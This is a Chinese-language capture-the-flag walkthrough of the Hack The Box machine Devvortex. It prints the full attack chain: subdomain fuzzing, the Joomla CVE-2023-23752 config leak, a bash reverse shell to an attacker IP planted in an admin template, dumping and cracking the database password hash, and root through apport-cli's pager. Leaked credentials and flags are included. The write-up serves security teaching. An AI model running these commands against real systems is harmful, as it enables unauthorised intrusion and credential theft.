[Meachines][Easy]Devvortex
字数 784 2025-08-19 12:42:11

Devvortex 渗透测试实战教学文档

1. 目标信息收集

1.1 初始扫描

nmap -p- 10.10.11.242 --min-rate 1000

将目标IP添加到hosts文件:

echo '10.10.11.242 devvortex.htb' >> /etc/hosts

1.2 子域名爆破

安装必要工具:

apt install seclists

使用wfuzz进行子域名爆破:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" --hl 7

发现子域名后更新hosts:

echo '10.10.11.242 dev.devvortex.htb' >> /etc/hosts

1.3 目录扫描

gobuster dir --url "http://dev.devvortex.htb/" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

检查robots.txt:

curl http://dev.devvortex.htb/robots.txt

2. Web应用分析

2.1 指纹识别

whatweb http://dev.devvortex.htb/

2.2 漏洞利用

发现Joomla! CMS,搜索相关漏洞:

searchsploit CVE-2023-23752

利用未授权访问漏洞获取配置信息:

curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq

获取到管理员凭据:

username: lewis
password: P4ntherg0t1n5r3c0n##

3. 初始访问

3.1 登录后台

访问管理员面板:

http://dev.devvortex.htb/administrator/

3.2 植入反向Shell

导航至:

System -> Templates -> Administrator Templates

编辑index.php文件,添加反向shell代码:

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.23/10032 0>&1'");

保存后监听:

nc -lvnp 10032

4. 权限提升

4.1 稳定Shell

方法1:

script /dev/null -c /bin/bash
# 按Ctrl+Z
stty raw -echo; fg
# 按两次Enter
export TERM=xterm

方法2:

SHELL=/bin/bash script -q /dev/null

4.2 数据库信息收集

检查MySQL服务:

netstat -ano

连接MySQL:

mysql -u lewis -p
# 密码: P4ntherg0t1n5r3c0n##

查询Joomla数据库:

show databases;
use joomla;
show tables;
select username,password from sd4fg_users;

4.3 密码破解

保存哈希:

echo "\$2y\$10\$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12" > hash

使用John破解:

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash

获取用户logan的密码:

username: logan
password: tequieromucho

切换用户:

su logan

获取用户flag:

cat /home/logan/user.txt
# a2e439ebea0891abde76fa39322ee67a

4.4 提权至root

检查sudo权限:

sudo -l

发现可以执行:

/usr/bin/apport-cli

分析apport-cli:

  1. 该工具使用/usr/bin/sensible-pager作为分页器
  2. sensible-pager支持!命令执行

利用方法:

sudo /usr/bin/apport-cli -f
# 输入任意数字进入菜单
# 选择V查看报告详情
# 在分页器中输入: !/bin/bash

成功获取root权限,读取flag:

cat /root/root.txt
# ebbf314456c1a1428c243b579b031a9f

5. 关键知识点总结

  1. 子域名爆破:使用wfuzz和seclists字典
  2. Joomla漏洞利用:CVE-2023-23752未授权访问API
  3. 反向Shell植入:通过模板编辑植入PHP反向shell
  4. 密码破解:使用John破解Joomla的bcrypt哈希
  5. 特权提升:利用apport-cli的sensible-pager特性通过!执行命令

6. 防御建议

  1. 限制API访问权限
  2. 及时更新CMS系统
  3. 避免使用弱密码
  4. 限制sudo权限
  5. 审计使用外部分页器的应用程序
Devvortex 渗透测试实战教学文档 1. 目标信息收集 1.1 初始扫描 将目标IP添加到hosts文件: 1.2 子域名爆破 安装必要工具: 使用wfuzz进行子域名爆破: 发现子域名后更新hosts: 1.3 目录扫描 检查robots.txt: 2. Web应用分析 2.1 指纹识别 2.2 漏洞利用 发现Joomla ! CMS,搜索相关漏洞: 利用未授权访问漏洞获取配置信息: 获取到管理员凭据: 3. 初始访问 3.1 登录后台 访问管理员面板: 3.2 植入反向Shell 导航至: 编辑index.php文件,添加反向shell代码: 保存后监听: 4. 权限提升 4.1 稳定Shell 方法1: 方法2: 4.2 数据库信息收集 检查MySQL服务: 连接MySQL: 查询Joomla数据库: 4.3 密码破解 保存哈希: 使用John破解: 获取用户logan的密码: 切换用户: 获取用户flag: 4.4 提权至root 检查sudo权限: 发现可以执行: 分析apport-cli: 该工具使用 /usr/bin/sensible-pager 作为分页器 sensible-pager 支持 ! 命令执行 利用方法: 成功获取root权限,读取flag: 5. 关键知识点总结 子域名爆破 :使用wfuzz和seclists字典 Joomla漏洞利用 :CVE-2023-23752未授权访问API 反向Shell植入 :通过模板编辑植入PHP反向shell 密码破解 :使用John破解Joomla的bcrypt哈希 特权提升 :利用apport-cli的sensible-pager特性通过 ! 执行命令 6. 防御建议 限制API访问权限 及时更新CMS系统 避免使用弱密码 限制sudo权限 审计使用外部分页器的应用程序